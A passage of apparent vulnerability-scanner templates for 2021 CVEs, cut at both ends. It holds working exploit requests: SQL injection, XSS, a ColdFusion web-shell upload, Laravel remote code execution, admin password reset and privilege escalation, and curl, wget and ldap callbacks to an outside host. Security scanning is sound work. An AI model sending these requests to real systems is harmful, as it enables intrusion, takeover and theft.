Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/elfinder/elfinder-cke.html","{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html","{{BaseURL}}/assets/elFinder/elfinder.html","{{BaseURL}}/backend/elfinder/elfinder-cke.html","{{BaseURL}}/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html","{{BaseURL}}/uploads/elfinder/elfinder-cke.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["elfinder","php/connector"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31862","info":{"name":"SysAid 20.4.74 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["(body == \"false <script>alert(document.domain)</script>\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-29203","info":{"name":"HPE Edgeline Infrastructure Manager <1.22 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"Password\":\"{{randstr}}\"}\n","POST /redfish/v1/SessionService/Sessions/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"UserName\":\"Administrator\",\"Password\":\"{{randstr}}\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["X-Auth-Token","PasswordReset","Location"],"condition":"and"},{"type":"word","part":"body","words":["Base.1.0.Created"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2021-24827","info":{"name":"WordPress Asgaros Forum <1.15.13 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 15s\nGET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"asgarosforum\")"],"condition":"and"}]}]},{"id":"CVE-2021-32172","info":{"name":"Maian Cart <=3.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, /; q=0.01\nAccept-Language: en-US,en;q=0.5\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e\n","GET /product-downloads/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_3, \"{{randstr_1}}\")","status_code_3 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"hash","group":1,"regex":["\"hash\"\\:\"(.*?)\"\\,"],"internal":true}]}]},{"id":"CVE-2021-42192","info":{"name":"KONGA 0.14.9 - Privilege Escalation","severity":"high"},"requests":[{"raw":["POST /login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"password\": \"{{password}}\", \"identifier\": \"{{username}}\"}\n","POST /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"token\": \"{{token}}\"}\n","PUT /api/user/{{id}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nContent-Type: application/json;charset=utf-8\n\n{\"admin\": \"true\", \"passports\": {\"password\": \"{{password}}\", \"protocol\": \"local\"}, \"token\": \"{{token}}\", \"password_confirmation\": \"{{password}}\"}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_2, \"\\\"admin\\\":false\")","contains(body_3, \"\\\"admin\\\":true\")"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\"id\":([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-31856","info":{"name":"Layer5 Meshery 0.5.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/experimental/patternfile?order=id%3Bselect(md5({{num}}))&page=0&page_size=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46107","info":{"name":"Ligeo Archives Ligeo Basics - Server Side Request Forgery","severity":"high"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n","GET /archive/download?file=http://{{interactsh-url}}/ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body_2) && contains(body_1, 'Ligeo Archives')","contains(interactsh_protocol, 'http') && contains(body_1, 'Ligeo Archives')"]}]}]},{"id":"CVE-2021-21307","info":{"name":"Lucee Admin - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /lucee/admin/imgProcess.cfm?file=/whatever HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=a\n","POST /lucee/admin/imgProcess.cfm?file=/../../../context/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nimgSrc=\n<cfoutput>\n\n<table>\n<form method=\"POST\" action=\"\">\n<tr><td>Command:</td><td><input type=test name=\"cmd\" size=50\n<cfif isdefined(\"form.cmd\")>value=\"#form.cmd#\"</cfif>><br></td></tr>\n<tr><td>Options:</td><td> <input type=text name=\"opts\" size=50\n<cfif isdefined(\"form.opts\")>value=\"#form.opts#\"</cfif>><br></td></tr>\n<tr><td>Timeout:</td><td> <input type=text name=\"timeout\" size=4\n<cfif isdefined(\"form.timeout\")>value=\"#form.timeout#\"\n<cfelse> value=\"5\"</cfif>></td></tr>\n</table>\n<input type=submit value=\"Exec\" >\n</form>\n<cfif isdefined(\"form.cmd\")>\n<cfsavecontent variable=\"myVar\">\n<cfexecute name = \"#Form.cmd#\"\narguments = \"#Form.opts#\"\ntimeout = \"#Form.timeout#\">\n</cfexecute>\n</cfsavecontent>\n<pre>\n","POST /lucee/{{randstr}}.cfm HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id&opts=&timeout=5\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-20092","info":{"name":"Buffalo WSR-2533DHPL2 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}} HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=8; url=ping.html; mobile=false;\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-javascript"]},{"type":"word","words":["/*DEMO*/","addCfg("],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-24236","info":{"name":"WordPress Imagements <=1.2.5 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-comments-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryIYl2Oz8ptq5OMtbU\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"author\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"email\"\n\n{{randstr}}@email.com\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"url\"\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"checkbox\"\n\n\nyes\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"naam\"\n\n{{randstr}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"image\"; filename=\"{{php}}\"\nContent-Type: image/jpeg\n\n<?php echo 'CVE-2021-24236'; ?>\n\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"submit\"\n\nPost Comment\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_post_ID\"\n\n{{post}}\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU\nContent-Disposition: form-data; name=\"comment_parent\"\n\n0\n------WebKitFormBoundaryIYl2Oz8ptq5OMtbU--\n","GET /wp-content/plugins/imagements/images/{{php}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"word","part":"body_2","words":["CVE-2021-24236"]}]}]},{"id":"CVE-2021-41467","info":{"name":"JustWriting  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46379","info":{"name":"D-Link DIR850 ET850-1.08TRb03 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/boafrm/formWlanRedirect?redirect-url=http://interact.sh&wlan_id=1"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-46069","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_mechanic HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&name=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&contact=asd1&email=asd1@asd.com&status=1\n","GET /admin/?page=mechanics HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-33044","info":{"name":"Dahua IPC/VTH/VTO - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /RPC2_Login HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/javascript, */*; q=0.01\nConnection: close\nX-Requested-With: XMLHttpRequest\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\"id\": 1, \"method\": \"global.login\", \"params\": {\"authorityType\": \"Default\", \"clientType\": \"NetKeyboard\", \"loginType\": \"Direct\", \"password\": \"Not Used\", \"passwordType\": \"Default\", \"userName\": \"admin\"}, \"session\": 0}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"result\":true","id","params","session"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[",\"result\":true,\"session\":\"([a-z]+)\"\\}"],"part":"body"}]}]},{"id":"CVE-2021-40323","info":{"name":"Cobbler <3.3.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>find_profile</methodName>\n  <params>\n    <param>\n      <value>\n        <struct>\n          <member>\n            <name>name</name>\n            <value>\n              <string>*</string>\n            </value>\n          </member>\n        </struct>\n      </value>\n    </param>\n  </params>\n</methodCall>\n","POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>generate_script</methodName>\n  <params>\n    <param>\n      <value>\n        <string>{{profile}}</string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string></string>\n      </value>\n    </param>\n    <param>\n      <value>\n        <string>/etc/passwd</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/xml"]},{"type":"regex","regex":["root:.*:0","bin:.*:1","nobody:.*:99"],"condition":"or"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"profile","group":1,"regex":["<value><string>(.*?)</string></value>"],"internal":true}]}]},{"id":"CVE-2021-46704","info":{"name":"GenieACS => 1.2.8 - OS Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/ping/;`id`"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/plain"]},{"type":"regex","part":"body","regex":["uid=([0-9]+)"]},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["uid=(\\d+)\\((\\w+)\\)"],"part":"body"}]}]},{"id":"CVE-2021-3129","info":{"name":"Laravel with Ignition <= v8.4.2 Debug Mode - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"AA\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log\"}}\n","POST /_ignition/execute-solution HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\n\n{\"solution\": \"Facade\\\\Ignition\\\\Solutions\\\\MakeViewVariableOptionalSolution\", \"parameters\": {\"variableName\": \"cve20213129\", \"viewFile\": \"phar://../storage/logs/laravel.log/test.txt\"}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","Illuminate"],"condition":"and"},{"type":"status","status":[500]}],"extractors":[{"type":"regex","regex":["(u|g)id=.*"]}]}]},{"id":"CVE-2021-39146","info":{"name":"XStream 1.4.18 - Arbitrary Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<sorted-set>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='javax.swing.MultiUIDefaults' serialization='custom'>\n      <unserializable-parents/>\n      <hashtable>\n          <default>\n            <loadFactor>0.75</loadFactor>\n            <threshold>525</threshold>\n          </default>\n          <int>700</int>\n          <int>0</int>\n      </hashtable>\n      <javax.swing.UIDefaults>\n          <default>\n            <defaultLocale>zh_CN</defaultLocale>\n            <resourceCache/>\n          </default>\n      </javax.swing.UIDefaults>\n      <javax.swing.MultiUIDefaults>\n          <default>\n            <tables>\n            <javax.swing.UIDefaults serialization='custom'>\n              <unserializable-parents/>\n              <hashtable>\n                <default>\n                  <loadFactor>0.75</loadFactor>\n                  <threshold>525</threshold>\n                </default>\n                <int>700</int>\n                <int>1</int>\n                <string>lazyValue</string>\n                <javax.swing.UIDefaults_-ProxyLazyValue>\n                  <className>javax.naming.InitialContext</className>\n                  <methodName>doLookup</methodName>\n                  <args>\n                    <string>ldap://{{interactsh-url}}/#evil</string>\n                  </args>\n                </javax.swing.UIDefaults_-ProxyLazyValue>\n              </hashtable>\n              <javax.swing.UIDefaults>\n                <default>\n                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>\n                  <resourceCache/>\n                </default>\n              </javax.swing.UIDefaults>\n            </javax.swing.UIDefaults>\n            </tables>\n          </default>\n      </javax.swing.MultiUIDefaults>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n  <javax.naming.ldap.Rdn_-RdnEntry>\n    <type>test</type>\n    <value class='com.sun.org.apache.xpath.internal.objects.XString'>\n      <m__obj class='string'>test</m__obj>\n    </value>\n  </javax.naming.ldap.Rdn_-RdnEntry>\n</sorted-set>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["timestamp","com.thoughtworks.xstream"],"condition":"or"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-20038","info":{"name":"SonicWall SMA100 Stack - Buffer Overflow/Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};{{prefix_addr}}{{system_addr}};{curl,http://{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'};?{{repeat(\"A\", 518)}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"prefix_addr":["%04%d7%7f%bf%18%d8%7f%bf%18%d8%7f%bf"],"system_addr":["%08%b7%06%08","%64%b8%06%08"]},"attack":"clusterbomb","matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-32305","info":{"name":"Websvn <2.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-45380","info":{"name":"AppCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/m/inc_head.php?q=%22%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"\"></script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25299","info":{"name":"Nagios XI 5.7.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","GET /nagiosxi/admin/sshterm.php?url=javascript:alert(document.domain) HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"iframe src=\\\"javascript:alert(document.domain)\") && contains(body_3, \"SSH Terminal\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-21799","info":{"name":"Advantech R-SeeNet 2.4.12 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/telnet_form.php?hostname=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Ctitle%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Telnet </title><script>alert(document.domain)</script><title></title>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22205","info":{"name":"GitLab CE/EE - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/sign_in"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","words":["015d088713b23c749d8be0118caeb21039491d9812c75c913f48d53559ab09df","02aa9533ec4957bb01d206d6eaa51d762c7b7396362f0f7a3b5fb4dd6088745b","051048a171ccf14f73419f46d3bd8204aa3ed585a72924faea0192f53d42cfce","08858ced0ff83694fb12cf155f6d6bf450dcaae7192ea3de8383966993724290","0993beabc8d2bb9e3b8d12d24989426b909921e20e9c6a704de7a5f1dfa93c59","0a5b4edebfcb0a7be64edc06af410a6fbc6e3a65b76592a9f2bcc9afea7eb753","1084266bd81c697b5268b47c76565aa86b821126a6b9fe6ea7b50f64971fc96f","14c313ae08665f7ac748daef8a70010d2ea9b52fd0cae594ffa1ffa5d19c43f4","1626b2999241b5a658bddd1446648ed0b9cc289de4cc6e10f60b39681a0683c4","20f01320ba570c73e01af1a2ceb42987bcb7ac213cc585c187bec2370cf72eb6","27d2c4c4e2fcf6e589e3e1fe85723537333b087003aa4c1d2abcf74d5c899959","292ca64c0c109481b0855aea6b883a588bd293c6807e9493fc3af5a16f37f369","2eaf7e76aa55726cc0419f604e58ee73c5578c02c9e21fdbe7ae887925ea92ae","30a9dffe86b597151eff49443097496f0d1014bb6695a2f69a7c97dc1c27828f","318ee33e5d14035b04832fa07c492cdf57788adda50bb5219ef75b735cbf00e2","33313f1ff2602ef43d945e57e694e747eb00344455ddb9b2544491a3af2696a1","335f8ed58266e502d415f231f6675a32bb35cafcbaa279baa2c0400d4a9872ac","34031b465d912c7d03e815c7cfaff77a3fa7a9c84671bb663026d36b1acd3f86","3407a4fd892e9d5024f3096605eb1e25cad75a8bf847d26740a1e6a77e45b087","340c31a75c5150c5e501ec143849adbed26fed0da5a5ee8c60fb928009ea3b86","38981e26a24308976f3a29d6e5e2beef57c7acda3ad0d5e7f6f149d58fd09d3d","3963d28a20085f0725884e2dbf9b5c62300718aa9c6b4b696c842a3f4cf75fcd","39b154eeefef684cb6d56db45d315f8e9bf1b2cc86cf24d8131c674521f5b514","39fdbd63424a09b5b065a6cc60c9267d3f49950bf1f1a7fd276fe1ece4a35c09","3b51a43178df8b4db108a20e93a428a889c20a9ed5f41067d1a2e8224740838e","3cbf1ae156fa85f16d4ca01321e0965db8cfb9239404aaf52c3cebfc5b4493fb","40d8ac21e0e120f517fbc9a798ecb5caeef5182e01b7e7997aac30213ef367b3","4448d19024d3be03b5ba550b5b02d27f41c4bdba4db950f6f0e7136d820cd9e1","450cbe5102fb0f634c533051d2631578c8a6bae2c4ef1c2e50d4bfd090ce3b54","455d114267e5992b858fb725de1c1ddb83862890fe54436ffea5ff2d2f72edc8","4568941e60dbfda3472e3f745cd4287172d4e6cce44bed85390af9e4e2112d0b","45b2cf643afd34888294a073bf55717ea00860d6a1dca3d301ded1d0040cac44","473ef436c59830298a2424616d002865f17bb5a6e0334d3627affa352a4fc117","4990bb27037f3d5f1bffc0625162173ad8043166a1ae5c8505aabe6384935ce2","4a081f9e3a60a0e580cad484d66fbf5a1505ad313280e96728729069f87f856e","4abc4e078df94075056919bd59aed6e7a0f95067039a8339b8f614924d8cb160","504940239aafa3b3a7b49e592e06a0956ecaab8dbd4a5ea3a8ffd920b85d42eb","52560ba2603619d2ff1447002a60dcb62c7c957451fb820f1894e1ce7c23821c","530a8dd34c18ca91a31fbae2f41d4e66e253db0343681b3c9640766bf70d8edf","5440e2d